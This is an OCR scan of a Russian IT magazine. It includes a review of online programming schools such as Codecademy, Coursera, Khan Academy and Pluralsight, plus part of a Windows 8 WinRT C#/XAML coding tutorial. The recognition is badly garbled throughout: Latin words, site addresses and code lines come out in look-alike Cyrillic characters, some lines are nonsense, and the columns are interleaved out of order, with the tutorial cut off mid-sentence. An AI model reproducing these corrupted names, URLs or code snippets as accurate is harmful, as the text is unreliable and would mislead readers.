загрузчиками. Ну не могла МісгозоН 
не нагадить. Опять-таки, как всегда. 
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ГЛУБИННОЕ ЗОНДИРОВАНИЕ 

Руководство по использованию ин- 
струментов динамическойтрассировки 
для исследования поведения системы 
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ПРОЙДИ ШКОЛУ жизни 

Обзор онлайн-школ, позволяющих 
заниматься самообразованием 
по множеству ІТ-дисциплин. 
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К0ДИНГДЛЯ^1Н00^58 

Продолжаем разговоре программирова- 
нии Меіго-приложений. На этот раз речь 
пойдето^іпсІоѵѵзѲ. 



5УМ/АСК 
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САМСЕБЕСИНОПТИК 

Быстро разворачиваем популярные об- 
лачные сервисы: пошаговое руководство 
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МНОГОСЛОЙНАЯ БРОНЯ 

Набор советов, позволяющих создать 
максимально безопасное окружение 
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дляАгигеи Агпагоп ЕС2. дляработы веб-приложений. 



ПРИПОДНЯТЬ ПОТОЛОК 

Сравниваем расширения для популяр- 
ных веб-серверов, позволяющихзначи- 
тельноувеличить производительность. 
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Игорь «5рі(іег_ЫЕТ» Антонов (ап(опоѵ.ідог.кЬѵ0дтаіІ.сот, ѵг-опііпе.ги) 




ОБЗОР ОНЛАЙН-КУРСОВ ПОВЫШЕНИЯ 
КВАЛИФИКАЦИИ ДЛЯ ПРОГРАММИСТОВ 



Про то, как учат в отечественных институтах и университетах, ты знаешь и сам. После пяти лет 
обучения-тому-как-учиться ты выходишь с дипломом и говоришь себе: «да, спасибо советской школе, 
математику тут преподавали нормально. Теперь мне осталось научиться программировать». 

И тут — оба — и эта статья! Камон, парень, сейчас модно учиться в онлайне! 



Сосіеасасіету 

БЕСПЛАТНО 

ЯЗЫК: английский/русский 
САЙТ: соаеасасіету.сот 

В «академии кода» обучение полностью бес- 
платное, и ты вправе сам выбирать его интен- 
сивность. Здесь нет четких планов, экзаменов 
и жестких графиков. По факту весь контроль 
над собой ложится на твои же плечи. 

В общем виде процесс обучения здесь стро- 
ится следующим образом. Ты регистрируешься 
на сайте, выбираешь желаемую дисциплину 



(язык программирования) и приступаешь 
к изучению теоретических и практических 
заданий. В настоящее время на Собеасасіеппу 
для изучения доступны следующие языки 
программирования: РуіЬоп, РиЬу, ^аѵа5сгір^, 
НТМІ/С55иі0иегу. 

РЕЗЮМЕ: Хороший бесплатный сервис. Не- 
смотря на бесплатность и вольный подход 
к обучению, здесь можно почерпнуть неплохие 
начальные знания. Само собой, Собеасабету 
не сотворит из тебя профи, но дать хороший 
старт и первую практику однозначно поможет. 
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Пройди школу жизни 



КИап Асасіету 

БЕСПЛАТНО 

ЯЗЫК: английский 

САЙТ: \ѵѵѵѵѵ.кЬапасасІетѵ.огд 

Это не просто опііпе-школа, это громаднейшая 
библиотека курсов на любой вкус и цвет. Как и у 
других подобных проектов, здесь имеются 
не только компьютерные дисциплины. Здесь 
ты можешь освоить математику, экономику, 
физику, биологию, медицину и не только. В на- 
стоящий момент на проекте доступно 218 670 436 
уроков! Пожалуй, это самая «богатая» из суще- 
ствующих в настоящее время опііпе-школ. 

Процесс обучения в КЬап Асасіету построен 
так. Ты выбираешь наиболее понравившуюся 



дисциплину и начинаешь последовательно 
изучать уроки, входящие в состав курса. 
Каждый урок сопровождается небольшой 
теоретической частью, интерактивной консо- 
лью, справочником функций и интерактивным 
табло результатов. Если по урокам возникают 
вопросы — их всегда можно задать в коммен- 
тариях. Студентов на проекте тусуется много, 
и вероятность получить оперативный ответ 
крайне высока. 

РЕЗЮМЕ: Шикарная кладовая актуальной ин- 
формации. Количество интересных тем просто 
поражает. Мне очень понравился курс для но- 
вичков в разработке игр. Более доходчивого 
описания этого сложного, но интересного 




процесса за свою практику мне не доводилось 
видеть. Особенно порадовала интерактивная 
консоль. С ее помощью можно сразу внести 
правки в код (например, в код игры) и тут же 
увидеть результат. 



Соиг$ега 

БЕСПЛАТНО 

ЯЗЫК: английский 

САЙТ: Ьир5://ѵѵѵѵ\л^.соиг5ега.огд 

Что будет, если онлайн-школу организует 
не просто кучка энтузиастов, а профессора 
одного из самых престижных университетов 
мира, Стэнфорда? Ответ чрезвычайно прост — 
получится убойный виртуальный колледж, 
мимо которого вряд ли сможет пройти хоть 
один студент. Соигзега — яркий тому при- 
мер. Проект был запущен в начале этого года, 
но уже успел прогреметь и собрать ни много 
ни мало — чуть больше миллиона студентов. 

Все курсы абсолютно бесплатны, и среди 
дисциплин есть не только компьютерные 

Сосіе ЗсИооІ 

ПЛАТНО И БЕСПЛАТНО 
ЯЗЫК: английский 
САЙТ: ѵѵѵѵѵѵ.сосіезсЬооІ.сот 

Проект сразу бросается в глаза отличным ди- 
зайном и веселым форматом подачи. Казалось 
бы, юмор при рассмотрении серьезных вещей 
вроде ]Оиегу, РиЬу, біі, РоР не очень уместен, 
но авторам курсов удалось доказать обратное. 

Теории дается только необходимый мини- 
мум. Авторы делают ставку на то, что все тео- 
ретические пробелы ты сможешь восполнить 
по ходу реализации собственного проекта. 

РеерСосІе 

ПЛАТНО И БЕСПЛАТНО 
ЯЗЫК: английский 
САЙТ: Ьирз://реерсосіе.сот 

Ты интересовался модными нынче трендами 
вроде по(іе.]5, с1о]иге, РоР? На РеерСосіетебе 
не только про них расскажут, но и смогут по- 
казать наглядные примеры использования. 
Система обучения построена на скринкастах. 
Каждый урок — это отдельный профессио- 
нально записанный и озвученный видеоролик. 

99% материалов распространяется на плат- 
ной основе. Цены разные, и каждый сможет 



науки, но и более приземленные вещи вроде 
экономики и менеджмента. Материалы держат 
высокую планку качества, а преподавателями 
являются не абы кто, а те самые профессора 
из Стэнфорда. 

Список компьютерных дисциплин доста- 
точно многогранен. Тут тебе и криптография, 
и отдельный курс по алгоритмам, и функцио- 
нальное программирование, и много чего еще. 
Одним словом, заправляться знаниями здесь 
можно чрезвычайно долго и продуктивно. 
Главное — выбрать интересные курсы и успеть 
записаться на нужную сессию (обучение про- 
ходит в реальном времени). 

РЕЗЮМЕ: Огромный плюс ресурса состоит 
в разнообразии доступных курсов — найти 



Формат обучения такой же, как и в других 
школах. Тебе предлагают просмотреть не- 
сколько скринкастов, автор которых расска- 
зывает необходимую теоретическую часть. 
(Іосле ты получишь практические задания. 

Все они выполняются на сайте в интерактив- 
ной консоли. 

РЕЗЮМЕ: Дизайн ресурса и стиль изложения 
материалов вызывают сугубо положительные 
эмоции. Теория подается в максимально вы- 
годном свете и не позволяет заснуть до начала 
практики. Цены на курсы достаточно невы- 
сокие (что-то около 25-30 долларов в месяц). 



найти для себя наиболее удобный тарифный 
план. Например, пакет из десяти скринкастов 
с возможностью отложенного просмотра стоит 
99 долларов — по нынешним меркам вполне 
приемлемая цена. Видео поставляется в НО- 
формате, а произношение диктора радует слух 
и не требует постоянных перемоток, чтобы ра- 
зобрать, о чем же говорил индийский учитель. 

РЕЗЮМЕ: Школа придется по душе любителям 
скринкастов и современных методов обучения. 
Тут всё рассказывают и показывают доста- 
точно подробно. РеерСосІе не выдает никаких 
сертификатов и готов тебя обучать, если у тебя 




полезное для себя смогут не только разра- 
ботчики и любители околокомпьютерных тем, 
но и экономисты, и любители астрономии, на- 
пример. Преподаватели из Стэнфорда — залог 
качества знаний. Цена — второй важный плюс 
ресурса. Обучение полностью бесплатно. 




Помимо платных дисциплин, на сайте проекта 
имеются и бесплатные уроки. 




сошмсі «гІіЬ шЫг» >■ ОШ рероЬг РЦг Цг Й«)Г игіот. 




есть денежки и ты владеешь английским. Ка- 
чество видеороликов и речь дикторов приятно 
удивят. Пожалуй, не хватает только систем 
планирования занятий и проверки знаний. 
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СосІеРІауег 

БЕСПЛАТНО 
ЯЗЫК: английский 
САЙТ: іЬесосіерІауег.сот 

Я бы назвал этот проект не школой, а за- 
ранее подготовленным реалити-шоу. Здесь 
нет привычных последовательных уроков 
по определенной теме. Неттут и заумных 
лекций от именитых представителей. Зато 
здесь имеется возможность понаблюдать, 
как приложение создается с нуля. Получает- 
ся что-то вроде подробного скринкаста: код 
последовательно набирается, а в области 

ИНТУИТ 

ПЛАТНО и БЕСПЛАТНО 
ЯЗЫК: русский 
САЙТ: ѵѵ\л/\л/.іпІиі1.ги 

Аббревиатура ИНТУИТ расшифровывается 
как Интернет-университет информационных 
технологий. Здесь любой желающий может 
не только освоить определенную дисциплину 
(например, пройти курс по программирова- 
нию игр для ѴѴіпсІоѵѵз РЬопе 7), но и получить 
полное высшее образование. По окончании 
курсов выдается весь необходимый пакет 
документов и диплом негосударственного 
образца. 

Специалист 

ПЛАТНО 

ЯЗЫК: русский 

САЙТ: ѵѵѵѵ\л/.5ресіаІІ5!.ги 

Сразу хочу сказать: это одно из немногих 
мест, где можно постичь компьютерные науки 
на родном языке. Компьютерный центр обуче- 
ния «Специалист» создан при всем известном 
МГТУ им. Н. Э. Баумана и готов предложить 
обучение различным дисциплинам в двух 
форматах: онлайн и офлайн. Перечень офлайн- 
курсов однозначно лидирует, но и список 
онлайн-дисциплин старается не отставать. 

Тут ты можешь познакомиться с С, ЗаѵаБсгірІ 
и другими технологиями. 

РІигаІБІдИІ 

ПЛАТНО И БЕСПЛАТНО 
ЯЗЫК: английский 
САЙТ: рІигаІБІдЫ.сот 

Онлайн-школа с неплохой подборкой обуча- 
ющего материала по вселенной .МЕТ. Тут тебя 
ждут курсы по модному нынче А5Р.МЕТ, не- 
плохой десятичасовой сет по языку С# и много 
чего еще. Такие популярные направления, 
как Апсігоісі, НТМ15, С++, РоѵѵегБЬеІІ, М5 501 
Бегѵег, также не оставлены в стороне. Всего 
проект насчитывает чуть больше трехсот пре- 
красно сбалансированных курсов. 

Система обучения в РІигаІзідЫ построена 
следующим образом. Теория подается в форме 



результатов отображается текущее состояние 
проекта. Создается ощущение, что ты стоишь 
за монитором крутого разработчика, творяще- 
го на твоих глазах кодерские чудеса. Набрав- 
шись опыта и вдохновившись идеей, ты сам 
сможешь присоединиться к проекту и создать 
свой обучающий сет. 

РЕЗЮМЕ: В первую очередь ресурс интере- 
сен своим нестандартным подходом к об- 
учению. Воспроизвести пример не составит 
труда, а возможность присоединиться к числу 
авторов уроков — дополнительный плюс. 

Для полного счастья ресурсу не хватает только 




солидного объема обучающих материалов. 
Пока количество видео не столь велико, 
как хотелось бы, но начало положено. 



Список доступных для изучения дисциплин 
достаточно велик. Тут есть курсы по ^аѵа, РНР, 
С# и многим другим технологиям. Обучение 
ведется как по программам профессиональной 
подготовки, так и повышения квалификации. 
Первый вариант круче, так как часов на него 
отводится значительно больше, следователь- 
но, и объем знаний будет выше. 

РЕЗЮМЕ: Получить образование или повы- 
сить квалификацию не выходя из дома — 
предложение интересное, но делать на него 
основную ставку надо с большой осторожно- 
стью. Диплом негосударственного образца во 
многих компаниях нашей необъятной родины 




воспринимается прохладно. Поэтому вариант 
учебы в онлайне вместо посещения реального 
вуза лучше не рассматривать. 



Особая фишка центра обучения «Специ- 
алист» — возможность пройти авторизи- 
рованные курсы компании МісгозоН. Все 
лекции представляют собой запись реальных 
занятий — те же сертифицированные пре- 
подаватели, лабораторные работы и прочий 
студенческий трэш, угар и содомия. Ну а в кон- 
це, как и полагается, будет выдан сертификат 
об окончании курса. 

РЕЗЮМЕ: Впитывать знания на родном языке 
всегда приятней, а для тех, кто не знаком 
с английским, — единственная возможность. 
Огорчает, что список дисциплин, доступных 
для изучения в режиме онлайн, уступает 
офлайновому варианту. Однако возможность 




пройти авторизированные курсы от Місгобоіі 
с последующей выдачей сертификата — хоро- 
шая компенсация. 



заранее записанных лекций — скринкастов. 
Предусмотрена возможность после прохожде- 
ния курса проверить знания — сдать внутрен- 
ний экзамен. 

РЕЗЮМЕ: Эта школа однозначно порадует 
любителей мира .МЕТ. Интересных курсов тут 
предостаточно, и их количество продолжает 
расти. Качество материалов также оставляет 
приятные впечатления. Английский дикторов 
хорош, и речь разборчива — тебя ведь не на- 
прягает индийский акцент? :) (Дены также 
весьма демократичные. Например, месячная 
подписка стоит около 30 долларов. Огорчила 
лишь техническая сторона проекта. С раз- 
махом сегодняшних веб-технологий можно 




было сотворить более продвинутую площадку 
для обучения студентов. 
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Ргодгатг 

БЕСПЛАТНО 
ЯЗЫК: английский 
САЙТ: \ѵ\л/ѵѵ.ргодгатг.сот 

Если ты из тех людей, которые считают, 
что главное — практика, а теория приложит- 
ся потом, то рекомендую обратить внимание 
на школу Ргодгатг. На этом проекте тебе 
помогут познать популярные языки програм- 
мирования (РНР, .МЕТ, ^аѵа, С++ и другие) 
без занудной теории. Процесс обучения сво- 
дится к получению и выполнению очередного 
практического задания. 



Как правило, каждое задание содержит ку- 
сок кода, который необходимо довести до ума. 
Код ты пишешь самостоятельно в специальной 
консоли, доступной прямо на странице урока. 
Закончив кодировать, ты сразу можешь про- 
тестировать созданное решение и проверить 
его на корректность. 

РЕЗЮМЕ: Количество доступных уроков впе- 
чатляет. К тому же все они распространяются 
совершенно бесплатно. Уровень уроков также 
различен. Есть как совсем простые, так и до- 
статочно сложные. Для решения некоторых за- 
дач однозначно придется обратиться к книгам, 



Ргодгатг 




которые и должны синхронизировать теорию 
и практику. 



ВІос 

ПЛАТНО 

ЯЗЫК: английский 
САЙТ: ѵ^ѵ\/ѵ\/.Ыос.іо 

А вот это уже самая настоящая школа с реаль- 
ными преподавателями и некислым ценником. 
Стоимость обучения за двенадцать недель 
составляет 5000 американских президентов! 
За это время преподаватели обещают сделать 
из тебя настоящего веб-разработчика. В про- 
грамму входят технологии: РиЬу, командная 
строка *піх-терминала, біі, НТМ1/С55, базы 
данных, фреймворк РиЬу оп Раііз и другие. 



Высокая стоимость обучения обосновыва- 
ется практически индивидуальным подходом 
к каждому студенту. Доходит до того, что 
за каждым учеником закрепляется персональ- 
ный тренер, который готов в любое время про- 
консультировать и ответить на всевозможные 
вопросы. 

РЕЗЮМЕ: Предложение заманчивое — спи- 
сок тем крайне интересен, но высокая цена... 
Возможно, полученные знания действительно 
стоят запрашиваемых денег, но пока прове- 
рить это можно разве что по отзывам бывших 
студентов. 




Нехіеі 

БЕСПЛАТНО 

ЯЗЫК: русский 
САЙТ; Ьехіеі.огд 

Проект запущен совсем недавно и сделан 
по примеру сервиса Соигзега, о котором мы 
уже говорили. Ты можешь выбрать для себя 
одну из двух ролей — потребитель и созида- 
тель. В первом случае ты становишься студен- 



том, а во втором — преподавателем, имеющим 
возможность организовать собственный курс. 

В настоящее время на Нехіеі доступен 
всего лишь один профильный курс — «Раз- 
работка приложений под Мае 05 X». Учитывая 
детский возраст проекта, это нормально. Пока 
авторы не берут денег за обучение, но по- 
пулярность проекта уверенно растет, так 
что переход на коммерческие рельсы вполне 
возможен. 




Название 

проекта 


Практика 
в режиме опііпе 


Интерактив 


Язык 


СосіеАсасІету 


Да 


Нет 


Русский/ 

Английский 


РеерСосІе 


Нет 


Нет 


Английский 


Соигзега 


Да 


Да 


Английский 


СосІеРІауег 


Нет 


Нет 


Английский 


КЬапАсасІету 


Да 


Да 


Английский 


ВІОС 


Да 


Да 


Английский 


Ргодгатг 


Да 


Нет 


Английский 


РІигаІзідЫ 


Да 


Нет 


Английский 


СосІеЗсЬооІ 


Да 


Нет 


Английский 


Специалист 


Да 


Да 


Русский 


Интуит 


Нет 


Да 


Русский 


Нехіеі 


Нет 


Да 


Русский 
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[сертификация в режиме омііыеі 

Часть школ, описанных в обзоре предоставляют сертификат о про- 
хождении курса. Формат сертификата у каждого заведения свой. 
Одни высылают почтой реальную «бумажку», а кто-то просто созда- 
ет профиль студента на сайте школы. 

Профит от таких «дипломов» разный. Если ты прошел обучение 
в буржуйской школе и получил красивый сертификат, то будь уве- 
рен — в 90% случаев он не будет представлять никакого интереса 
для российских работодателей. Исключение составляют удаленные 
курсы от монстров вроде МіегозоИ. 

Возлагать большие надежды на иностранные свидетельства 
не стоит. Лучше сразу продумать пути отступления и закрепить 
свои знания в российских сертификационных центрах. Самыми 
лучшими в этой категории ресурсов считаются: Реігаіесб (геІгаІесЬ. 
ги), упомянутый центр обучения «Специалист» (ѵѵѵѵѵѵ.зресіаІізСги ] 
и ИНТУИТ ( \л/ѵѵѵѵ.іп1ии.ги1 . Эти сертификационные центры у многих 
на слуху и пользуются большим доверием в российских компаниях. 

Следует также учитывать, что сертификат, полученный в ре- 
зультате опііпе-экзамена, всегда имеет меньшую ценность, чем 
полученный в реальном центре обучения. Все понимают, что схи- 
трить на таком экзамене гораздо проще и проверить объективность 
знаний крайне проблематично. ЗС 



105 













кодинг 



Юрий «уигетЬо» Язев, ведущий программист компании Сепотебатев Іѵѵѵѵѵѵ.рдепот.ги] 



В 



КОДИНГ ДЛЯ 

ѴѴіпсІоѵѵз 8 




ИСПЫТЫВАЕМ НОВЫЕ 
ИНСТРУМЕНТЫ ДЛЯ 
ПРОГРАММИРОВАНИЯ 
ПОД «ВОСЬМЕРКУ» 

Новая версия операционной системы 
от МісгозоН содержит в себе больше 
нововведений, чем любая предшествующая 
за последние 17 лет винда! Средства 
разработки приложений для нее также 
претерпели множество изменений, поэтому 
на них нам стоит обратить пристальное 
внимание. Вдобавок к тому, что ѴѴіпсІоѵѵз 8 
предустанавливается на множестве устройств, 
каждое из них, имея доступ к вебу, имеет 
доступ к ѴѴіпсІоѵѵз Зіоге — централизованному 
магазину приложений, в котором продавать 
свои приложения может каждый разработчик. 



, ВСТУПЛЕНИЕ В НОВУЮ ЭРУ 

ѴѴіпсІоѵѵз 8 образовала вокруг себя новую экосистему: новые устрой- 
ства, новые приложения. Місгозо^І называет происходящее новой 
эрой. В центре внимания, безусловно, Ме^го-интерфейс, позволяю- 
щий одинаково работать на устройствах с разными форм-факторами. 
На первый взгляд Меіго чужд, как и все новое и неординарное. 
Действительно, стандартный оконный интерфейс используется уже 
несколько десятилетий, и до сих пор не было серьезных попыток 
что-то здесь изменить, хотя нужда в этом имеется. Особо остро во- 
прос нового интерфейса встал с учетом всеобщего распространения 
устройств с тач-экранами. Вместе с упрощением доступа к информа- 
ции понадобились новые средства для удобной работы с ней. Меіго 
призван стать этим средством. Тем не менее в новой операционке 
у пользователя все еще есть классические (старые добрые) методы 
взаимодействия с данными — ими он может воспользоваться, 
работая, например, на десктопе, имеющем полноформатную клаву 
и мышь. 

Меня с самого начала разработка «восьмерки» живо интере- 
совала, поэтому я пристально слежу за ее развитием — с первой 
превьюшки. В результате мне удалось увидеть, как сильно выросла 
система в технологическом плане за последний год. 

НОВОЕ МЫШЛЕНИЕ 

Меіго-интерфейс привнес не только иначе выглядящие приложе- 
ния, изменились и принципы функционирования самой системы — 
она стала более бережно относиться к заряду аккумулятора девайса, 
на котором работает. В новом операционном окружении система 
предотвращает скопления большого количества выполняющихся 
в фоне процессов. Таким образом, ресурсы системы тратятся только 
для работы приложения, с которым в данный момент взаимодейству- 
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ет пользователь. Как только приложение уходит в фон — становится 
неактивным, ОС запускает таймер, и, если по прошествии нескольких 
секунд пользователь не возвратил управление данному приложению, 
ѴѴіпсІоѵѵз переводит его в режим «приостановки» (зизрепсіесЛ. В этом 
режиме приложение по-прежнему находится в памяти, но не выпол- 
няется. В момент, когда операционной системе начинает не хватать 
ресурсов, она выгружает приостановленные приложения. Поэтому 
все не сохраненные данные будут утеряны. Переход между режимами 
«приостановки» и «уничтожения» незаметен для программиста, по- 
этому ему надо позаботиться о сохранении данных приложения, когда 
оно «приостанавливается», и, соответственно, загружать данные, 
когда оно активизируется. 

I СРЕДСТВА разработки! 

в «восьмерке» имеется два типа приложений: 

1. Классические \Л/іп32-приложения. 

2. Полноэкранные приложения, имеющие современный Меіго- 
интерфейс, разработанные под новой программной платформой 
ѴѴіпсіо\л/з Рипііте (ѴѴіпРТ — не стоит путать с ѴѴіпсІоѵѵз РТ, то есть 
операционной системой для АРМ-процессоров). Вообще, ѴѴіпсІоѵѵз 
Рипііппе — это новая модель разработки приложений, написан- 
ная на неуправляемом коде и призванная заменить собой ѴѴіп32 
АРІ. Она разработана на основе оптимизированной версии СОМ, 
при этом плотно интегрирована суправляемыми.МЕТ-языками. 

Существуют четыре бесплатные (ехргезз) редакции ѴізиаІ Зіисііо 
2012. Каждую из них можно скачать со страницы ѵѵѵѵѵѵ.ппісгозо(1.сот/ 
ѵм5ііаІзиісіг,/Ѵ:к-,/Ѵіп , ѵпІоасіБ . Я, к примеру, скачал и установил три 
поскольку редакция іог ѴѴеЬ меня не слишком интересует. Редакция 
ѴізиаІ Біисііо 201 2 іог ѴѴіпбоѵѵз 8 предназначена для создания ѴѴіпРТ - 
приложений; ѴізиаІ 5(ис1іо 2012 іог ѴѴіпсІоѵѵз РЬопе, как следует из на- 
звания, используется для разработки приложений для смартфона: 
поддерживаются все три поколения ѴѴіпРЬопе: 7.0, 7.5, 8.0. И не ме- 
нее интересная редакция — ѴізиаІ Біисііо 2012 Ьг Оезкіор предназна- 
чена для разработки классических — нативных ѴѴіп32 и управляемых 
.МЕТ оконных приложений. Вместе с этой редакцией устанавливается 
ѴѴіпсІоѵѵз 50К. К слову, сейчас ОігесіХ 50К не поставляется отдельно, 
а входит в этот комплект 50К. После установки каждая из редакций 
требует регистрации, только после этого будет выдан триальный 
ключ продолжительностью 30 дней. После истечения этого срока 
можно будет продлить ехргезз-лицензию. Уже вышел первый сервис- 



пак для студии, поэтому после ее установки не забудь 
накатить это обновление. 

В итоге для разработки приложений под ѴѴіпсІоѵѵз 
8 можно использовать три подсистемы: ѴѴіп32, .МЕТ, 
ѴѴіпРТ. Основной тип приложений для ѴѴіпсІоѵѵз 8 — 
І^іпРТ, имеющий Меіго-интерфейс, — это так назы- 
ваемые приложения для магазина ѴѴіпсІоѵѵз (\Л/іпсіоѵѵз 
5іоге). Таким образом, в эту категорию попадают 
все дотнет-языки, расширенный С++/СХ (Сотропепі 
Ехіепзіопз) плюс ЗаѵаБсгірІ. В последнем случае 
для описания внешнего вида используются НТМІ и С55, 
а с остальными языками — ХАМЕ. Особо примечатель- 
но, что чистый веб-язык ЗаѵаЗсгірІ (вместе с ООМ) встал 
в один ряд вместе с другими языками прикладного 
программирования наравне с С# и ѴВ. Таким образом, 
для разработки ѴѴіпРТ-приложений можно использовать 
любой язык, входящий в ѴізиаІ Біисііо 2012 Ьг ѴѴіпсІоѵѵз 
8. ѴізиаІ Біисііо 2012 іо г ѴѴіпсІоѵѵз Оезкіор пригодится 
для разработки приложений с оконным интерфейсом 
(^іп32, .МЕТ), полноэкранных игр с поддержкой ОігесіХ, 
а также для сопровождения унаследованных программ. 

Для отладки могут быть использованы три спосо- 
ба: проведение отладки на локальном компьютере, 
на симуляторе планшета (рис. 1) и дебаг на удаленном 
(подключенном) девайсе с установленными тулзами 
для отладки. 

Хотя существует несколько редакций студии, сегодня мы вос- 
пользуемся Ѵ5 іог ѴѴіпсІоѵѵз 8, поскольку она позволяет создавать 
истинные ѴѴіп8-аппликации. 

ІѴѴІМКТ^ 

с приходом ѴѴіпРТ «восьмерка» возымела (хорошее слово, даже ис- 
правлять не хочется. — Прим, ред.) совершенно отличный от старых 
версий интерфейс, который добавил разработчикам материала 
для исследования. Как стало очевидно, сначала Місгозоіі опробовала 
этот новый Меіго-интерфейс на смартфонах, а уже потом реализо- 
вала его в операционной системе для устройств с большим экраном 
(хотелось сказать «для десктопов», однако уже не только для них). 

Начнем разрабатывать приложения для \^іпсіоѵѵз 8 с Меіго- 
интерфейсом для подсистемы ^іпсіоѵѵз Рипііте, а заодно посмо- 
трим на новую версию студии и новые инструменты. Запусти ѴізиаІ 
Зіибіо 2012 Ехргезз іог \^іпс1оѵѵз 8. Обычным образом открой диалог 
создания нового проекта (рис. 2). В шаблонах создаваемых проектов 
имеется четыре языка, на которых можно писать приложения; каж- 
дый язык содержит по одной категории — приложения для магазина 
ѴѴіпсІоѵѵз. Я предпочитаю кодить для ѴѴіпсІоѵѵз на языке С#, поэтому 




Рис. 2. Создание приложения 
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0^ МуЫеѵкАррІ - Экслресс-еыпуск МюоіоП ѴкиаІ &пк)ю Л012 дяя ѴѴігкіоѵл 8 

•АЙЛ ПРАВКА вид проект ПОСТРОСНИЕ ОТЛАДКА КОМАНДА СЕРВИС АШГАЭИН ТЕа ОКНО СПРАВКА 
в « и ► ПошмяшшЛаш»тр - ОсЫч • АпуСРО ■ ^ . Ь ТЦ ^ ■ 



Л Ѳ - о 5 в о > Р 



.■![ !»ух1«і.Со1Іг<гіот.бтсгіс; 

Іп« $ух«с*.ІО; 
іхг. &у*«п.К1лц; 

1 ',. Ыіп<Іоіп.А|ірИс«(іалМоВг1; 

1 ’^ ЫІпВом.АррІісаЕіолГЫсІ.АсЕІѵвТіоп; 
1п| ЫІпАяк.ГоитіаКіст; 

!-ѵу иіп^ом.ЕоилВ«Еіоп.Со11*сЕІОп«: 

1 -<Ь ыіпдом.иі.ХмІ; 

1лі' Ыіп^ак.кП Хмі.СопЕгоіа; 

ыіпаош.ѴІ.ХшІ.СопКгоІх.РгіаіКіѵп: 
: Ыімкяп.Ш.ХмІ.Іми; 

: ніікюм.ш.хміі.іпріік: 



А о Арр^шпI 
А О МмпР«9ед«т<1 

Р МуНсжАррІ.ТвпропгуКсу^ 

I: Р.(Ь9<ч>Р»т>*»<»« 



Затем в файле С#-кода этой страницы надо 
перегрузить обработчик события ОпМаѵідаІесіТо; 

ргрТесІесі оѵеггісіе у.оісі ОпNаѵі§а1:есIТо♦-' 
(NаѵІ8а^іопЕѵеп■^:Аг85 е) { 

5І:гіп§ рагат = е.РагатеТег аз зігіпб; 
Ьа5е.0пNаѵІ8а•^:есIТо(е) ; 

} 



Рис. 3. Интерфейс ѴівиаІ 5Ш(1іо 2012 теперь выполнен в оИвсЬооІ темной гамме. 

создадим новое пустое приложение, избрав этот язык (рис. 3). По- 
добно разработке ѴѴР-проекта, когда переключишься на страницу 
МаіпРаде.хаппІ, будет доступен визуальный конструктор (вместе 
с ХАМІ-кодом), только в данном случае присутствует эмулятор 
не смартфона, а планшета. Можно настроить вид устройства: задать 
ориентацию (Іапсізсаре, Рогігаіі, еіс.), визуальное состояние, разре- 
шение. Также можно увидеть структуру, определяющую вид приложе- 
ния. В панели инструментов находятся все визуальные компоненты, 
которые можно поместить на форме эмулятора. За ХАМІ-файлом 
находится С5-файл, содержащий функционал данной страницы. 

В отличие от ѴѴР-приложений, ѴѴіпРТ-приложения не имеют раз- 
меток РІѴОІ и Рапогата, зато ѴѴіпсІоѵѵз Біоге приложения оптимизиро- 
ваны для удобной смены страниц, в итоге можно построить интер- 
фейс приложения на десятках страниц. Добавим в наше приложение 
такую возможность. Для этого сначала добавим дополнительную 
страницу (далее предполагаю, что используется версия студии 
на русском языке). Открой контекстное меню, щелкнув в «Обозрева- 
теле решений» на элементе проекта, из меню выбери «Добавить 
Создать элемент». В появившемся окне выбери «ѴізиаІ С# — > Магазин 
Ѵ^іпсіоѵѵз», из списка справа выбери страницу для создания, напри- 
мер «Страница элементов». После этого появится диалог, разреша- 
ющий добавление зависимостей. На первую страницу добавь кнопку, 
щелчком по ней будем переходить на только что созданную страницу. 
Чтобы реализовать переход на другую страницу, в обработчике щелч- 
ка по кнопке напиши: 

ІЬІ5 . Ргате . Маѵі8аТе(‘1:урео-Р( І-Ьет5Ра§е1) ) ; 



В первой строчке тела метода переданный 
параметр преобразуется к нужному типу, во вто- 
рой — вызывается родительский обработчик. 

Еще один важный файл, входящий в обяза- 
тельный набор приложения, — Арр.хаппІ.сз. 

В нем находятся обработчики событий, про- 
исходящих в процессе работы приложения, 
например, опІаипсЬесІ вызывается в момент за- 
пуска приложения, а опЗизрепсііпд — в момент 
приостановки. Если необходимо обработать 
какие-то другие события, их обработчики можно 
добавить сюда. К примеру, ОпЗеагсЬАсІіѵаІесі 
вызывается, когда пользователь производит 
поиск по приложению с помощью системной 
«чудо»-кнопки. 

В ѴѴіпсІоѵѵз 5іоге приложениях панель при- 
ложения (Арріісаііоп Ваг) коренным образом от- 
личается от аналогичного элемента ^^іпРЬопе. 
Здесь арр Ьаг — это панель, появляющаяся 
в ответ на определенное действие пользователя — нажатие правой 
кнопки мыши или через комбинацию <ѴѴіп + 1 >. Каждая страни- 
ца может иметь максимум две панели: верхнюю и нижнюю. После 
условного жеста пользователя они показываются одновременно, 
выплывая поверх содержимого страниц. Обычно в эти панели по- 
мещают кнопки и текстовые строки. Хотя в «Панели элементов» есть 
компонент арр Ьаг, лучше создать его напрямую, написав ХАМІ-код, 
потому что при использовании визуальных средств создается много 
бесполезного кода, который затем все равно придется править: 

<Ра§е.ТорАррВаг> 

<АррВаг x:Nате="1:орАррВаг"> 

<!-- Верхний апп бар --> 

</АррВаг> 

</Ра§е.ТорАррВаг> 

Как только этот код будет добавлен, панель отобразится в кон- 
структоре, и ее наполнением можно заниматься, используя визу- 
альные средства. Первым делом у панели надо изменить свойство 
Огіепіаііоп с ѴегіісаІ на Ногігопіаі, чтобы помещаемые в нее объекты 
не растягивались по всей ширине. Чтобы добавить нижнюю панель, 
напиши такой код: 

<Ра§е . Во‘С'1:отАррВаг> 

<АррВаг х:Мате="Ьо'СТотАррВаг"> 

</АррВаг> 

</Ра§е . ВоТТотАррВаг> 



В этой строчке кода, воспользовавшись методом Маѵідаіе объекта 
Ргате текущей страницы, мы переходим на переданную в параметре 
страницу. Объект Ргате служит для отображения страницы на экране 
устройства. С помощью свойства СапбоВаск объекта Ргате на- 
ходящаяся на второй странице кнопка возврата позволяет вернуться 
на предыдущую страницу. Таким образом, просто заменяя имя стра- 
ницы в методе Маѵідаіе, можно осуществить переход на любую стра- 
ницу. Вдобавок с помощью этого метода можно передавать параметр 
между страницами. Для этого его надо указать вторым аргументом: 

1:ИІ5. Ргате. Маѵі§аТе(1:урео-Р(ІТет5Ра§е1), "весопсі рагат"); 



Для настройки доступны любые свойства панели: цвет бэкгра- 
унда, текст и шрифт, внешний вид, преобразование, определение 
жестов для взаимодействия и так далее. 

Центральное место среди всех объектов, определяющих вид 
